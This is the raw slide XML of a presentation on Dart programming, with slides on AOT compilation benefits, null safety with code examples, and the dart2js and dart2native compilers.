          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Used for apps that are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ready</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t> for production.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Results:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Improved performance.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Faster startup times, improved execution speed, and overall optimized resource usage. (Good for mobile phones).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Increased predictability</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Does not allow dynamic compilation features (Only static compilation).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;g2a0d279bb21_1_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2a0d279bb21_1_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440875" y="245400"/>
            <a:ext cx="2238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Null safety</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;g2a0d279bb21_1_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="818100"/>
            <a:ext cx="4260300" cy="4482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GB" sz="1600"/>
              <a:t>Purpose: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Eliminate common null reference errors.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>ariables cannot hold null values unless you explicitly declare them as nullable.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Null Checking.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Late Variables: </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="1600"/>
              <a:t>late</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t> keyword is used for variables that are non-nullable but are not initialized at the declaration. Dart trusts you to initialize it before it's used.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Null Assertion Operator (!).</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600"/>
              <a:t>Benefits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:extLst>
                  <a:ext uri="http://customooxmlschemas.google.com/">
                    <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="0"/>
                  </a:ext>
                </a:extLst>
              </a:rPr>
              <a:t>Error Prevention</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:extLst>
                <a:ext uri="http://customooxmlschemas.google.com/">
                  <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="1"/>
                </a:ext>
              </a:extLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:extLst>
                  <a:ext uri="http://customooxmlschemas.google.com/">
                    <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="2"/>
                  </a:ext>
                </a:extLst>
              </a:rPr>
              <a:t>Code Quality</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:extLst>
                <a:ext uri="http://customooxmlschemas.google.com/">
                  <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="3"/>
                </a:ext>
              </a:extLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:extLst>
                  <a:ext uri="http://customooxmlschemas.google.com/">
                    <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="4"/>
                  </a:ext>
                </a:extLst>
              </a:rPr>
              <a:t>Performance</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:extLst>
                <a:ext uri="http://customooxmlschemas.google.com/">
                  <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="5"/>
                </a:ext>
              </a:extLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:extLst>
                  <a:ext uri="http://customooxmlschemas.google.com/">
                    <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="6"/>
                  </a:ext>
                </a:extLst>
              </a:rPr>
              <a:t>API Clarity</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Google Shape;96;g2a0d279bb21_1_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97" name="Google Shape;97;g2a0d279bb21_1_27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4759800" y="509250"/>
            <a:ext cx="4072500" cy="412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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Default not null</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int myNumber = 5; // Valid</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int myNumber = null; // Invalid</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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// Explicit Null.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> myNullableNumber;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myNullableNumber = null; // Valid</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GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>late</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> int lateNumber;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lateNumber = calculateNumber(); // Initialized later</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GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int? nullableNumber;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// ... nullableNumber is assigned</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>print(nullableNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + 5); // Asserting it's not null</a:t>
            </a:r>
            <a:endParaRPr sz="16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Dart for web (dart2js)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809250" y="1374775"/>
            <a:ext cx="5247900" cy="2675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sz="1600"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>compatibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>: Used for compiling dart code to javascript.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t>Performs optimisations.</a:t>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-330200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1600"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600"/>
              <a:t>Command line:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600"/>
              <a:t> dart compile js -O2 -o main.js main.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600">
                <a:extLst>
                  <a:ext uri="http://customooxmlschemas.google.com/">
                    <go:slidesCustomData xmlns:go="http://customooxmlschemas.google.com/" textRoundtripDataId="7"/>
                  </a:ext>
                </a:extLst>
              </a:rPr>
              <a:t>dart</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2a0d279bb21_0_80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="514350"/>
            <a:ext cx="3447900" cy="1020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GB"/>
              <a:t>dart2native</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;g2a0d279bb21_0_80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5299710" y="1663958"/>
            <a:ext cx="3231000" cy="2880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GB"/>
              <a:t>Compiles dart code into an executable file for the current machine’s architecture</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="A screenshot of a computer&#10;&#10;Description automatically generated" id="110" name="Google Shape;110;g2a0d279bb21_0_80"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="482382" y="599411"/>
            <a:ext cx="4203920" cy="394467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Stefanos Theodosiou</dc:creator>
</cp:coreProperties>
</file>